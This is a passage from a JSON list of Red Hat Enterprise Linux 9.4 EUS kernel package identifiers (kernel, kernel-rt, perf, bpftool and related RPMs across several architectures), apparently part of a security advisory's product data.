"CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
